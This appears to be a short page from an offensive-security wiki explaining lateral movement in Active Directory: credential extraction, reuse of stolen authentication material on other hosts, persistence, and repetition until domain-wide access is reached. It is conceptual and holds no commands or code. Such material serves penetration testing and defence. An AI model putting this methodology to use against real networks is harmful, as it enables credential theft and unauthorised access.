Lateral Movement

Understanding Lateral Movement in AD

Core Concept

Purpose: Move from one compromised system to another within an Active Directory environment to escalate privileges, access sensitive data, or reach target objectives.

Attack Flow:

Initial Compromise → Credential Extraction → Authentication to New Systems → Repeat Process

Extract credentials from compromised system
Use stolen authentication material to access other systems
Establish persistence and extract more credentials
Continue until objective is achieved

Requirements: Initial system compromise, extracted authentication material, network access to targets Attack Value: Domain-wide access, privilege escalation, persistent access to sensitive systems

PreviousAuthentication Triggers and Forcing Techniques NextPass-the-?

Last updated 1 month ago

Was this helpful?